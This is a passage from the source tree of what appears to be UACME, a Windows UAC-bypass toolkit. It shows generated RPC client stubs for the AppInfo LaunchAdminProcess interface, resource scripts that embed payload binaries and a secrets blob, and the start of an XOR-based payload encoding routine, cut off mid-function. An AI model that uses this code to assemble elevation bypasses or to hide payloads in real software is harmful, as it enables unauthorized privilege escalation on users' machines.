Stack size/offset = 96 */\n/* 94 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 96 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\n/* 98 
*/\tNdrFcShort( 0x68 ),\t/* X64 Stack size/offset = 104 */\n/* 100 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString =\n    {\n        0,\n        {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  2 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/*  4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/*  6 */\t\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\n/*  8 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 10 */\t\n\t\t\t0x11, 0x0,\t/* FC_RP */\n/* 12 */\tNdrFcShort( 0xa ),\t/* Offset= 10 (22) */\n/* 14 */\t\n\t\t\t0x15,\t\t/* FC_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 20 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 22 */\t\n\t\t\t0x1a,\t\t/* FC_BOGUS_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 24 */\tNdrFcShort( 0x38 ),\t/* 56 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 28 */\tNdrFcShort( 0x14 ),\t/* Offset= 20 (48) */\n/* 30 */\t0x36,\t\t/* FC_POINTER */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 32 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 34 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 36 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 38 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x6,\t\t/* FC_SHORT */\n/* 40 */\t0x3e,\t\t/* FC_STRUCTPAD2 */\n\t\t\t0x4c,\t\t/* FC_EMBEDDED_COMPLEX */\n/* 42 */\t0x0,\t\t/* 0 */\n\t\t\tNdrFcShort( 0xffe3 ),\t/* Offset= -29 (14) */\n\t\t\t0x40,\t\t/* FC_STRUCTPAD4 */\n/* 46 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 48 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/* 50 */\t0x5,\t\t/* FC_WCHAR */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 52 */\t\n\t\t\t0x11, 0x4,\t/* FC_RP [alloced_on_stack] */\n/* 54 */\tNdrFcShort( 0x2 ),\t/* Offset= 2 (56) */\n/* 56 */\t\n\t\t\t0x1a,\t\t/* FC_BOGUS_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 58 
*/\tNdrFcShort( 0x18 ),\t/* 24 */\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 62 */\tNdrFcShort( 0x0 ),\t/* Offset= 0 (62) */\n/* 64 */\t0xb9,\t\t/* FC_UINT3264 */\n\t\t\t0xb9,\t\t/* FC_UINT3264 */\n/* 66 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 68 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 70 */\t\n\t\t\t0x11, 0xc,\t/* FC_RP [alloced_on_stack] [simple_pointer] */\n/* 72 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const unsigned short LaunchAdminProcess_FormatStringOffsetTable[] =\n    {\n    0\n    };\n\n\nstatic const MIDL_STUB_DESC LaunchAdminProcess_StubDesc = \n    {\n    (void *)& LaunchAdminProcess___RpcClientInterface,\n    MIDL_user_allocate,\n    MIDL_user_free,\n    &LaunchAdminProcess__MIDL_AutoBindHandle,\n    0,\n    0,\n    0,\n    0,\n    appinfo__MIDL_TypeFormatString.Format,\n    1, /* -error bounds_check flag */\n    0x50002, /* Ndr library version */\n    0,\n    0x801026e, /* MIDL Version 8.1.622 */\n    0,\n    0,\n    0,  /* notify & notify_flag routine table */\n    0x1, /* MIDL flag */\n    0, /* cs routines */\n    0,   /* proxy/server info */\n    0\n    };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n#else\n#pragma warning(disable:4206)\n#endif /* defined(_M_AMD64)*/\n"
  },
  {
    "path": "Source/Akagi/appinfo/x64/appinfo64.h",
    "content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0622 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for appinfo.idl:\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n\n\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of <rpcndr.h>\n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __appinfo64_h__\n#define __appinfo64_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n/* Forward Declarations */ \n\n/* header files for imported files */\n#include \"oaidl.h\"\n#include \"ocidl.h\"\n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __LaunchAdminProcess_INTERFACE_DEFINED__\n#define __LaunchAdminProcess_INTERFACE_DEFINED__\n\n/* interface LaunchAdminProcess */\n/* [version][uuid] */ \n\ntypedef struct _MONITOR_POINT\n    {\n    long MonitorLeft;\n    long MonitorRight;\n    } \tMONITOR_POINT;\n\ntypedef struct _APP_STARTUP_INFO\n    {\n    wchar_t *lpszTitle;\n    long dwX;\n    long dwY;\n    long dwXSize;\n    long dwYSize;\n    long dwXCountChars;\n    long dwYCountChars;\n    long dwFillAttribute;\n    long dwFlags;\n    short wShowWindow;\n    struct _MONITOR_POINT MonitorPoint;\n    } \tAPP_STARTUP_INFO;\n\ntypedef struct _APP_PROCESS_INFORMATION\n    {\n    unsigned __int3264 ProcessHandle;\n    
unsigned __int3264 ThreadHandle;\n    long ProcessId;\n    long ThreadId;\n    } \tAPP_PROCESS_INFORMATION;\n\n/* [async] */ void  RAiLaunchAdminProcess( \n    /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,\n    handle_t hBinding,\n    /* [string][unique][in] */ wchar_t *ExecutablePath,\n    /* [string][unique][in] */ wchar_t *CommandLine,\n    /* [in] */ long StartFlags,\n    /* [in] */ long CreationFlags,\n    /* [string][in] */ wchar_t *CurrentDirectory,\n    /* [string][in] */ wchar_t *WindowStation,\n    /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,\n    /* [in] */ unsigned __int3264 hWnd,\n    /* [in] */ long Timeout,\n    /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,\n    /* [out] */ long *ElevationType);\n\n\n\nextern RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec;\nextern RPC_IF_HANDLE LaunchAdminProcess_v1_0_s_ifspec;\n#endif /* __LaunchAdminProcess_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
  },
  {
    "path": "Source/Akagi/appinfo/x86-32/appinfo32.c",
    "content": "\n\n/* this ALWAYS GENERATED file contains the RPC client stubs */\n\n\n /* File created by MIDL compiler version 8.01.0622 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for appinfo.idl:\n    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0622 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)\n\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 )  /* redefine extern to static */\n#pragma warning( disable: 4232 )  /* dllimport identity*/\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\n#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */\n\n#pragma optimize(\"\", off ) \n\n#include \"appinfo32.h\"\n\n#define TYPE_FORMAT_STRING_SIZE   75                                \n#define PROC_FORMAT_STRING_SIZE   101                               \n#define EXPR_FORMAT_STRING_SIZE   1                                 \n#define TRANSMIT_AS_TABLE_SIZE    0            \n#define WIRE_MARSHAL_TABLE_SIZE   0            \n\ntypedef struct _appinfo_MIDL_TYPE_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\n    } appinfo_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _appinfo_MIDL_PROC_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\n    } appinfo_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _appinfo_MIDL_EXPR_FORMAT_STRING\n    {\n    long          Pad;\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\n    } appinfo_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER  
_RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\n\nextern const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString;\nextern const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString;\nextern const appinfo_MIDL_EXPR_FORMAT_STRING appinfo__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE   0            \n\n\n/* Standard interface: LaunchAdminProcess, ver. 1.0,\n   GUID={0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE LaunchAdminProcess___RpcClientInterface =\n    {\n    sizeof(RPC_CLIENT_INTERFACE),\n    {{0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}},{1,0}},\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n    0,\n    0,\n    0,\n    0,\n    0,\n    0x00000000\n    };\nRPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec = (RPC_IF_HANDLE)& LaunchAdminProcess___RpcClientInterface;\n\nextern const MIDL_STUB_DESC LaunchAdminProcess_StubDesc;\n\nstatic RPC_BINDING_HANDLE LaunchAdminProcess__MIDL_AutoBindHandle;\n\n\n/* [async] */ void  RAiLaunchAdminProcess( \n    /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,\n    handle_t hBinding,\n    /* [string][unique][in] */ wchar_t *ExecutablePath,\n    /* [string][unique][in] */ wchar_t *CommandLine,\n    /* [in] */ long StartFlags,\n    /* [in] */ long CreationFlags,\n    /* [string][in] */ wchar_t *CurrentDirectory,\n    /* [string][in] */ wchar_t *WindowStation,\n    /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,\n    /* [in] */ unsigned __int3264 hWnd,\n    /* [in] */ long Timeout,\n    /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,\n    /* [out] */ long *ElevationType)\n{\n\n    NdrAsyncClientCall(\n                      ( PMIDL_STUB_DESC  )&LaunchAdminProcess_StubDesc,\n                      (PFORMAT_STRING) &appinfo__MIDL_ProcFormatString.Format[0],\n                      ( unsigned 
char * )&RAiLaunchAdminProcess_AsyncHandle);\n    \n}\n\n\n#if !defined(__RPC_WIN32__)\n#error  Invalid build platform for this stub.\n#endif\n\n#if !(TARGET_IS_NT50_OR_LATER)\n#error You need Windows 2000 or later to run this stub because it uses these features:\n#error   [async] attribute, /robust command line switch.\n#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.\n#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.\n#endif\n\n\nstatic const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString =\n    {\n        0,\n        {\n\n\t/* Procedure RAiLaunchAdminProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags:  */\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  8 */\tNdrFcShort( 0x38 ),\t/* x86 Stack size/offset = 56 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x4 ),\t/* x86 Stack size/offset = 4 */\n/* 14 */\tNdrFcShort( 0x9a ),\t/* 154 */\n/* 16 */\tNdrFcShort( 0x58 ),\t/* 88 */\n/* 18 */\t0xc6,\t\t/* Oi2 Flags:  clt must size, has return, has ext, has async handle */\n\t\t\t0xc,\t\t/* 12 */\n/* 20 */\t0x8,\t\t/* 8 */\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter ExecutablePath */\n\n/* 28 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 30 */\tNdrFcShort( 0x8 ),\t/* x86 Stack size/offset = 8 */\n/* 32 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter CommandLine */\n\n/* 34 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 36 */\tNdrFcShort( 0xc ),\t/* x86 Stack size/offset = 12 */\n/* 38 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter StartFlags */\n\n/* 40 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 42 */\tNdrFcShort( 0x10 ),\t/* x86 Stack size/offset = 16 */\n/* 44 
*/\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter CreationFlags */\n\n/* 46 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 48 */\tNdrFcShort( 0x14 ),\t/* x86 Stack size/offset = 20 */\n/* 50 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter CurrentDirectory */\n\n/* 52 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\n/* 54 */\tNdrFcShort( 0x18 ),\t/* x86 Stack size/offset = 24 */\n/* 56 */\tNdrFcShort( 0x8 ),\t/* Type Offset=8 */\n\n\t/* Parameter WindowStation */\n\n/* 58 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\n/* 60 */\tNdrFcShort( 0x1c ),\t/* x86 Stack size/offset = 28 */\n/* 62 */\tNdrFcShort( 0x8 ),\t/* Type Offset=8 */\n\n\t/* Parameter StartupInfo */\n\n/* 64 */\tNdrFcShort( 0x10a ),\t/* Flags:  must free, in, simple ref, */\n/* 66 */\tNdrFcShort( 0x20 ),\t/* x86 Stack size/offset = 32 */\n/* 68 */\tNdrFcShort( 0x16 ),\t/* Type Offset=22 */\n\n\t/* Parameter hWnd */\n\n/* 70 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 72 */\tNdrFcShort( 0x24 ),\t/* x86 Stack size/offset = 36 */\n/* 74 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter Timeout */\n\n/* 76 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 78 */\tNdrFcShort( 0x28 ),\t/* x86 Stack size/offset = 40 */\n/* 80 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter ProcessInformation */\n\n/* 82 */\tNdrFcShort( 0x4112 ),\t/* Flags:  must free, out, simple ref, srv alloc size=16 */\n/* 84 */\tNdrFcShort( 0x2c ),\t/* x86 Stack size/offset = 44 */\n/* 86 */\tNdrFcShort( 0x3c ),\t/* Type Offset=60 */\n\n\t/* Parameter ElevationType */\n\n/* 88 */\tNdrFcShort( 0x2150 ),\t/* Flags:  out, base type, simple ref, srv alloc size=8 */\n/* 90 */\tNdrFcShort( 0x30 ),\t/* x86 Stack size/offset = 48 */\n/* 92 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 94 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, 
*/\n/* 96 */\tNdrFcShort( 0x34 ),\t/* x86 Stack size/offset = 52 */\n/* 98 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString =\n    {\n        0,\n        {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  2 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/*  4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/*  6 */\t\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\n/*  8 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 10 */\t\n\t\t\t0x11, 0x0,\t/* FC_RP */\n/* 12 */\tNdrFcShort( 0xa ),\t/* Offset= 10 (22) */\n/* 14 */\t\n\t\t\t0x15,\t\t/* FC_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 20 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 22 */\t\n\t\t\t0x16,\t\t/* FC_PSTRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 24 */\tNdrFcShort( 0x30 ),\t/* 48 */\n/* 26 */\t\n\t\t\t0x4b,\t\t/* FC_PP */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 28 */\t\n\t\t\t0x46,\t\t/* FC_NO_REPEAT */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 30 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 32 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 34 */\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/* 36 */\t0x5,\t\t/* FC_WCHAR */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 38 */\t\n\t\t\t0x5b,\t\t/* FC_END */\n\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 40 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 42 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 44 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 46 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 48 */\t0x6,\t\t/* FC_SHORT */\n\t\t\t0x3e,\t\t/* FC_STRUCTPAD2 */\n/* 50 */\t0x4c,\t\t/* FC_EMBEDDED_COMPLEX */\n\t\t\t0x0,\t\t/* 0 */\n/* 52 */\tNdrFcShort( 0xffda ),\t/* Offset= -38 (14) */\n/* 54 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 56 */\t\n\t\t\t0x11, 0x4,\t/* FC_RP [alloced_on_stack] */\n/* 58 
*/\tNdrFcShort( 0x2 ),\t/* Offset= 2 (60) */\n/* 60 */\t\n\t\t\t0x15,\t\t/* FC_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 62 */\tNdrFcShort( 0x10 ),\t/* 16 */\n/* 64 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 66 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 68 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 70 */\t\n\t\t\t0x11, 0xc,\t/* FC_RP [alloced_on_stack] [simple_pointer] */\n/* 72 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const unsigned short LaunchAdminProcess_FormatStringOffsetTable[] =\n    {\n    0\n    };\n\n\nstatic const MIDL_STUB_DESC LaunchAdminProcess_StubDesc = \n    {\n    (void *)& LaunchAdminProcess___RpcClientInterface,\n    MIDL_user_allocate,\n    MIDL_user_free,\n    &LaunchAdminProcess__MIDL_AutoBindHandle,\n    0,\n    0,\n    0,\n    0,\n    appinfo__MIDL_TypeFormatString.Format,\n    1, /* -error bounds_check flag */\n    0x50002, /* Ndr library version */\n    0,\n    0x801026e, /* MIDL Version 8.1.622 */\n    0,\n    0,\n    0,  /* notify & notify_flag routine table */\n    0x1, /* MIDL flag */\n    0, /* cs routines */\n    0,   /* proxy/server info */\n    0\n    };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */\n\n"
  },
  {
    "path": "Source/Akagi/appinfo/x86-32/appinfo32.h",
    "content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0622 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for appinfo.idl:\n    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0622 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n\n\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of <rpcndr.h>\n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __appinfo32_h__\n#define __appinfo32_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n/* Forward Declarations */ \n\n/* header files for imported files */\n#include \"oaidl.h\"\n#include \"ocidl.h\"\n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __LaunchAdminProcess_INTERFACE_DEFINED__\n#define __LaunchAdminProcess_INTERFACE_DEFINED__\n\n/* interface LaunchAdminProcess */\n/* [version][uuid] */ \n\ntypedef struct _MONITOR_POINT\n    {\n    long MonitorLeft;\n    long MonitorRight;\n    } \tMONITOR_POINT;\n\ntypedef struct _APP_STARTUP_INFO\n    {\n    wchar_t *lpszTitle;\n    long dwX;\n    long dwY;\n    long dwXSize;\n    long dwYSize;\n    long dwXCountChars;\n    long dwYCountChars;\n    long dwFillAttribute;\n    long dwFlags;\n    short wShowWindow;\n    struct _MONITOR_POINT MonitorPoint;\n    } \tAPP_STARTUP_INFO;\n\ntypedef struct _APP_PROCESS_INFORMATION\n    {\n    unsigned __int3264 ProcessHandle;\n    
unsigned __int3264 ThreadHandle;\n    long ProcessId;\n    long ThreadId;\n    } \tAPP_PROCESS_INFORMATION;\n\n/* [async] */ void  RAiLaunchAdminProcess( \n    /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,\n    handle_t hBinding,\n    /* [string][unique][in] */ wchar_t *ExecutablePath,\n    /* [string][unique][in] */ wchar_t *CommandLine,\n    /* [in] */ long StartFlags,\n    /* [in] */ long CreationFlags,\n    /* [string][in] */ wchar_t *CurrentDirectory,\n    /* [string][in] */ wchar_t *WindowStation,\n    /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,\n    /* [in] */ unsigned __int3264 hWnd,\n    /* [in] */ long Timeout,\n    /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,\n    /* [out] */ long *ElevationType);\n\n\n\nextern RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec;\nextern RPC_IF_HANDLE LaunchAdminProcess_v1_0_s_ifspec;\n#endif /* __LaunchAdminProcess_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
  },
  {
    "path": "Source/Akagi/bin/Akatsuki64.cd",
    "content": ""
  },
  {
    "path": "Source/Akagi/bin/Fubuki32.cd",
    "content": ""
  },
  {
    "path": "Source/Akagi/bin/Fubuki64.cd",
    "content": ""
  },
  {
    "path": "Source/Akagi/bin/Kamikaze.cd",
    "content": ""
  },
  {
    "path": "Source/Akagi/bin32res.rc",
    "content": "#include \"bin32res.h\"\n#include \"winres.h\"\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US\nIDR_FUBUKI32 RCDATA \"bin\\\\fubuki32.cd\"\nIDR_KAMIKAZE RCDATA \"bin\\\\kamikaze.cd\"\nIDR_SECRETS RCDATA \"bin\\\\secrets32.bin\"\n"
  },
  {
    "path": "Source/Akagi/bin64res.rc",
    "content": "#include \"bin64res.h\"\n#include \"winres.h\"\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US\nIDR_FUBUKI64 RCDATA \"bin\\\\fubuki64.cd\"\nIDR_FUBUKI32 RCDATA \"bin\\\\fubuki32.cd\"\nIDR_AKATSUKI64 RCDATA \"bin\\\\akatsuki64.cd\"\nIDR_KAMIKAZE RCDATA \"bin\\\\kamikaze.cd\"\nIDR_SECRETS RCDATA \"bin\\\\secrets64.bin\"\n"
  },
  {
    "path": "Source/Akagi/compress.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2026\n*\n*  TITLE:       COMPRESS.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        12 Feb 2026\n*\n*  Compression and encoding/decoding support.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"encresource.h\"\n\n#pragma comment(lib, \"msdelta.lib\")\n#pragma comment(lib, \"Bcrypt.lib\")\n\n#define UACME_KEY_SIZE 32\n\ntypedef struct _DCK_HEADER {\n    DWORD Id;\n    BYTE Data[UACME_KEY_SIZE];\n} DCK_HEADER, * PDCK_HEADER;\n\n/*\n* EncodeBuffer\n*\n* Purpose:\n*\n* Decrypt/Encrypt given buffer.\n*\n*/\nVOID EncodeBuffer(\n    _In_ PVOID Buffer,\n    _In_ ULONG BufferSize,\n    _In_ ULONG Key\n)\n{\n    ULONG k, c;\n    PUCHAR ptr;\n\n    if ((Buffer == NULL) || (BufferSize == 0))\n        return;\n\n    k = Key;\n    c = BufferSize;\n    ptr = (PUCHAR)Buffer;\n\n    do {\n        *ptr ^= k;\n        k = _rotl(k, 1);\n        ptr++;\n        --c;\n    } while (c != 0);\n}\n\n/*\n* SelectSecretFromBlob\n*\n* Purpose:\n*\n* Return key used for decryption by Id from secrets blob.\n*\n* Use supHeapFree to release allocated result.\n*\n*/\nPVOID SelectSecretFromBlob(\n    _In_ ULONG Id,\n    _Out_ 